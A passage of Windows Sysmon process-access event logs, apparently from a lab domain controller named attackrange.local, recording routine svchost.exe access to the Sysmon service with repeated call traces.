05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 